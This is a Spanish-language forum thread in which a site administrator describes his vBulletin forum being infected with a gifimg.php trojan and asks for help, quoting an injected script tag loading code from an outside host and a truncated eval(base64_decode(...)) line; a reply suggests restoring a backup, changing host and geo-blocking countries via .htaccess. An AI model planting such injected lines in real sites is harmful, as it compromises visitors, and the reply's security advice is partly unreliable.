archivos (servidor) con troyano gifimg.php

olaechea Seguir

Gamma
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
2 Ene 2008
buenas un tema simple hace poco el foro que administro estaba bien, mas luego de dejarlo un tiempo a un amigo de pronto apareció un troyano añadido en la carpeta del servidor y afecta el foro
esto es mediante un código añadido que enlaza a varias pájinas por ahora a fenixmusica.com, y buscando info pues encontré esto:

Website Hacked Attack by iframe and index.php & gifimg.php base64_decode - Scammer Alert
Gifimg.php | Website Security
Ayer matamos a un virus-troyano desconocido que hemos llamado “Kytten” | Solosequenosenada

el código de vb está bien, pero lo que si es en cada carpeta del servidor donde está la carpeta del foro (/foro) se ha añadido el código
<script src=http://mojan.webphoto.ir/photos/ads-webphotos.php ></script>
y se ha creado un archivo llamado gifimg.php el cual buscando info indican que es un troyano,
incluso en varios códigos php se incluye
<?php eval(base64_decode(’aWYoIWlzc2V0 (BLABLABLA) RfUE9TVFsnZSddKSk7′)); ?>
lLo del (Blablabla) es un ejemplo, cómo eliminaría esa parte del eval¿???
lo mas simple es eliminarlo del servidor y todo bien, pero ahora la pregunta sería como hago para evitar de nuevo ese ataque osea permisos a la carpeta para evitar modifique, por ahora al momento de borrar el archivo lo normal es que tenga permiso:

644, que es: propietario, leer y editar - grupo, leer - publico, leer
ahora le estoy cambiando a
444, que es: propietario, leer - grupo, leer - publico, leer

y así cada vez que se deba editar solo lo pueda hacer manualmente y editando opciones creo así sería un medio para evitar de nuevo ese ataque, por cierto esto usando joomla me pasa lo mismo y otros script de pronto está contagiando al servidor
de hecho debo mandar un correo al servidor (godaddy) para que chequen ese tema, o es yo mismo quien generó ese problema o el servidor, por ahora qué me recomiendan hacer¿???

UndeR

Beta
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
2 Sep 2008
Hola olaechea,

Cuando dijiste godaddy lo dijiste todo. Mi consejo es que arregles el problema (si es posible cargando el último backup que tengas sin esas modificaciones) y luego te cambies de servidor. Hay muchísimos otros mucho pero MUCHO mejores y que si se preocupan por tratar de evitar esos ataques.

Yo la hago fácil. Además de tratar siempre de mejorar esas cosas de seguridad como tu mencionas (permisos de carpetas, etc), tengo bloqueados todos los paises que no me interesa que entren. A mi se me facilita porque la temática tratada en mi sitio y en español, se reduce a un manojo de paises. Te recomiendo que busques más información sobre ese tipo de ataques y veas de que paises provienen generalmente (suelen no ser de habla hispana y generalmente la lista está encabezada por China). Después buscá información sobre como agregar las opciones de DENY FROM a tu .htaccess y listo... se te acaban los problemas (o al menos la mayoría).

Antes de usar este método, me hackearon 3 veces (las últimas dos ya usando vB). Además te ahorrás el 80% de spammers que normalmente vuelven locos a tus usuarios verdaderos y, por si fuera poco, te bajan el posicionamiento en los buscadores.

Saludos,